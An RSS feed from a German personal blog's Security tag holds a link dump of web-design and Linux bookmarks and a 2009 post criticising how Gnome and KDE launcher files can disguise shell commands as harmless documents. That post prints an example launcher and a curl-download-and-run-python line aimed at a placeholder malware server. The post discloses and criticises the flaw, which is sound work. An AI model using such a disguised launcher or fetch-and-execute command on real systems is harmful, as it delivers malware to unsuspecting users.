<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>martin-grandrath.de &#187; Security</title>
	<atom:link href="http://martin-grandrath.de/tags/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://martin-grandrath.de</link>
	<description>Ein neues WordPress-Weblog</description>
	<lastBuildDate>Fri, 23 Oct 2009 22:35:41 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.5</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Linkdump Februar 2009</title>
		<link>http://martin-grandrath.de/2009/03/linkdump-februar-2009/</link>
		<comments>http://martin-grandrath.de/2009/03/linkdump-februar-2009/#comments</comments>
		<pubDate>Sun, 01 Mar 2009 19:32:18 +0000</pubDate>
		<dc:creator>Martin Grandrath</dc:creator>
				<category><![CDATA[Fundstücke]]></category>
		<category><![CDATA[CSS]]></category>
		<category><![CDATA[Framework]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[ltsp]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Surftipp]]></category>
		<category><![CDATA[VNC]]></category>
		<category><![CDATA[Webdesign]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://martin-grandrath.de/?p=86</guid>
		<description><![CDATA[Eine Liste der Seiten, die im Februar in meinen Bookmarks gelandet sind:
WordPress

Layer-Navigation mit wp_list_categories » Beitrag » WordPress Magazin
WordPress 2.7: HTML-Struktur der Kommentare ändern &#124; I am Jeriko
Separating Pings from Comments in WordPress 2.7 &#124; Sivel.net
WP Themer Kit &#8211; WordPress
WordPress 2.5 Plugin Style Guide &#8211; bueltge.de [by:ltge.de]

CSS

Introducing SelectorGadget: point and click CSS selectors
In the Woods [...]]]></description>
			<content:encoded><![CDATA[<p>Eine Liste der Seiten, die im Februar in meinen Bookmarks gelandet sind:</p>
<h3>WordPress</h3>
<ul>
<li><a href="http://www.wordpress-magazin.de/layer-navigation-mit-wp_list_categories/" rel="external">Layer-Navigation mit wp_list_categories » Beitrag » WordPress Magazin</a></li>
<li><a href="http://www.i-jeriko.de/2008/11/08/wordpress-27-html-struktur-der-kommentare-andern/" rel="external">WordPress 2.7: HTML-Struktur der Kommentare ändern | I am Jeriko</a></li>
<li><a href="http://sivel.net/2008/10/wp-27-comment-separation/#comment-1509" rel="external">Separating Pings from Comments in WordPress 2.7 | Sivel.net</a></li>
<li><a href="http://wpthemerkit.com/" rel="external">WP Themer Kit &#8211; WordPress</a></li>
<li><a href="http://bueltge.de/wordpress-25-plugin-style-guide/614/" rel="external">WordPress 2.5 Plugin Style Guide &#8211; bueltge.de [by:ltge.de]</a></li>
</ul>
<h3>CSS</h3>
<ul>
<li><a href="http://www.selectorgadget.com/" rel="external">Introducing SelectorGadget: point and click CSS selectors</a></li>
<li><a href="http://blog.themeforest.net/tutorials/vertical-centering-with-css/" rel="external">In the Woods &#8211; Vertical Centering With CSS</a></li>
<li><a href="http://dean.edwards.name/IE7/" rel="external">/IE7/</a></li>
<li><a href="http://drewish.com/tools/vertical-rhythm" rel="external">CSS with vertical rhythm | drewish.com</a></li>
</ul>
<h3>Webdesign</h3>
<ul>
<li><a href="http://www.dackworld.de/2009/02/02/10-wp-themes-in-grunge-design/" rel="external">10 WP-Themes in Grunge Design | Dackworld</a></li>
<li><a href="http://www.webdesign.org/web/photoshop/web-layout/making-the-clean-grunge-blog-design.17054.html" rel="external">Making the &#039;Clean Grunge&#039; Blog Design | Web Layout</a></li>
<li><a href="http://www.smashingmagazine.com/2009/02/16/50-beautiful-useful-and-free-icon-sets/" rel="external">50 Free High-Quality Icon Sets | Graphics | Smashing Magazine</a></li>
</ul>
<h3>Linux</h3>
<ul>
<li><a href="http://www.heise.de/netze/Das-Linux-Terminal-Server-Project--/artikel/119273" rel="external">heise Netze &#8211; 26.11.08 &#8211; Das Linux Terminal Server Project</a></li>
<li><a href="http://www.linux-magazin.de/heft_abo/ausgaben/2007/10/simplify_your_systems" rel="external">NX, LTSP, Wine &amp;amp; Co. läuten das Ende der „Turmschuh“-Administration ein « 10 « 2007 « Ausgaben « Heft &amp;amp; Abo « Linux-Magazin Online</a></li>
<li><a href="http://www.linux-magazin.de/heft_abo/ausgaben/2007/10/einer_fuer_alle" rel="external">Terminalservices mit Edubuntu und LTSP 5 « 10 « 2007 « Ausgaben « Heft &amp;amp; Abo « Linux-Magazin Online</a></li>
<li><a href="http://www.pl-berichte.de/t_netzwerk/fernsteuerung.html" rel="external">Pro-Linux: Linux fernsteuern mit ssh, X11 und VNC</a></li>
</ul>
<h3>Sonstiges</h3>
<ul>
<li><a href="http://www.ranum.com/security/computer_security/editorials/dumb/" rel="external">The Six Dumbest Ideas in Computer Security</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://martin-grandrath.de/2009/03/linkdump-februar-2009/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Sicherheitslücke in Gnome und KDE</title>
		<link>http://martin-grandrath.de/2009/02/sicherheitsluecke-in-gnome-und-kde/</link>
		<comments>http://martin-grandrath.de/2009/02/sicherheitsluecke-in-gnome-und-kde/#comments</comments>
		<pubDate>Thu, 26 Feb 2009 16:00:48 +0000</pubDate>
		<dc:creator>Martin Grandrath</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Gnome]]></category>
		<category><![CDATA[KDE]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://martin-grandrath.de/?p=76</guid>
		<description><![CDATA[Foobar beschreibt in seinem Blog eine Sicherheitslücke, die sowohl Gnome- als auch KDE-Desktops betrifft.  Das Problem besteht in den so genannten &#187;launchers&#171; (Starter), die dazu dienen, Verknüpfungen zu Programmen auf dem Desktop bzw. im Panel abzulegen.  Es handelt sich dabei um einfache Textdateien mit folgendem Aufbau (hier auf das Wesentliche gekürzt):

[Desktop Entry]
Icon=ooo-writer
Type=Application
Exec=ooffice -writer
Name=OpenOffice.org [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.geekzone.co.nz/foobar" rel="external">Foobar</a> beschreibt in seinem Blog eine Sicherheitslücke, die sowohl Gnome- als auch KDE-Desktops betrifft.  Das Problem besteht in den so genannten &raquo;launchers&laquo; (Starter), die dazu dienen, Verknüpfungen zu Programmen auf dem Desktop bzw. im Panel abzulegen.  Es handelt sich dabei um einfache Textdateien mit folgendem Aufbau (hier auf das Wesentliche gekürzt):</p>
<pre class="code">
[Desktop Entry]
Icon=ooo-writer
Type=Application
Exec=ooffice -writer
Name=OpenOffice.org Writer
</pre>
<p>Wird diese Datei z.B. unter dem Namen <code>ooo-writer.desktop</code> auf dem Desktop abgelegt, wird sie mit dem Writer-Icon und dem Text &raquo;OpenOffice.org Writer&laquo; angezeigt und startet <code>ooffice -writer</code> bei einem Doppelklick.  So weit so gut.</p>
<p>Das Problem besteht darin, dass erstens die Anweisung hinter <code>Exec=</code> beliebigen Shellcode enthalten kann und zweitens das <code>x</code>-Flag (executable) <em>nicht</em> gesetzt sein muss, damit dieser Code zur Ausführung gebracht wird.  Hinzu kommt, dass auch das Icon und der angezeigte Text beliebig manipulierbar sind und dass der Anwender keinerlei Hinweis bekommt was passiert, wenn er einen Doppelklick auf diesem Icon ausführt &ndash; außer er öffnet den Dialog &raquo;Eigenschaften&laquo;.  Im Klartext heißt das, dass ein solcher Launcher ein Writer-Symbol und den Text &raquo;harmloses_Dokument.odt&laquo; anzeigen, bei einem Doppelklick aber eine Zeile wie diese ausführen kann:</p>
<pre class="code">bash -c "curl http://www.some_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py"</pre>
<p>Die Möglichkeiten sollten klar sein.</p>
<p>Sowohl auf <a href="http://www.geekzone.co.nz/foobar/6229" rel="external">Foobars Blogartikel</a> als auch bei <a href="http://it.slashdot.org/it/09/02/17/1526244.shtml" rel="external">Slashdot</a> gab es viele Reaktionen.  Leider hat sich ein Großteil der anschließenden Diskussionen damit auseinandergesetzt, dass der verwendete Begriff &raquo;Virus&laquo; nicht korrekt sei (dem ich auch zustimmen würde) und dass man Anwender grundsätzlich nicht vor sich selber schützen kann.  Das zentrale Problem wurde aber meines Erachtens nur unzureichend behandelt.  Natürlich kann (und sollte) ein Betriebssystem (bzw. in diesem Fall eine Desktopumgebung) nicht versuchen, dem Anwender das Denken abzunehmen und wenn der User kundtut &raquo;ich möchte, dass $CODE ausgeführt wird&laquo;, dann sollte eben auch genau das passieren.  <em>Aber</em>: eine graphische Oberfläche, die es ermöglicht, einen potenziell schädlichen Code aus beliebiger Quelle optisch als gewöhnliche Datei erscheinen zu lassen, ist in meinen Augen schlicht und ergreifend kaputt.</p>
<p>Das Problem ist nicht neu, sondern im Gegenteil <a href="http://lwn.net/Articles/178409/" rel="external">seit 2006</a> bekannt und ich begreife nicht, warum die Gnome- und KDE-Entwickler nicht darauf reagieren.  Was spricht dagegen, den im Launcher angegebenen Befehl nur dann auszuführen, wenn das <code>x</code>-Flag gesetzt ist?</p>
<p>Einen Schutz (etwa das Deaktivieren dieser Funktionalität) scheint es nicht zu geben, sondern es bleibt einem nur übrig, einen anderen Desktop zu verwenden oder vor dem Öffnen einer vermeintlichen Office-Datei, die man per Mail erhalten hat, dreimal hinzusehen.</p>
<p>(via <a href="http://www.geekzone.co.nz/foobar/6229" rel="external">How to write a Linux virus in 5 easy steps</a>)</p>
]]></content:encoded>
			<wfw:commentRss>http://martin-grandrath.de/2009/02/sicherheitsluecke-in-gnome-und-kde/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

